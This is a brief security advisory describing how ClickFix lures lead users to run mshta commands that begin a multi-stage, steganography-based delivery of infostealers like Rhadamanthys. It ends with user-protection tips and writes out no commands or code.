ClickFix exploits deceive users into running mshta commands, initiating a multi-stage malware delivery that often leads to the Rhadamanthys infostealer.
Multi-Stage Execution
The attack begins when users are prompted by malicious webpages to execute an mshta command. This command downloads an obfuscated script utilizing hex-encoded URLs and rotated paths. The script then executes further obfuscated PowerShell commands.
Subsequently, PowerShell decrypts and loads a .NET assembly loader. This loader employs custom steganography to extract shellcode from PNG images, embedding payload bytes within pixel colors, primarily the red channel.
Advanced Techniques
The shellcode is injected into trusted processes via memory techniques, such as VirtualAllocEx and WriteProcessMemory. Final payloads often include infostealers like LummaC2 and Rhadamanthys.
This method of hiding malware in image files makes detection challenging, as the malware is reconstructed entirely in memory from seemingly innocuous files.
Preventive Measures
To stay protected, users should avoid following webpage prompts that urge command executions. Running scripts or commands from untrusted sources is discouraged, and manual typing is preferred over copy-pasting commands.
- Maintain updated security software with web protection
- Verify instructions through official support channels
- Educate yourself on emerging attack techniques
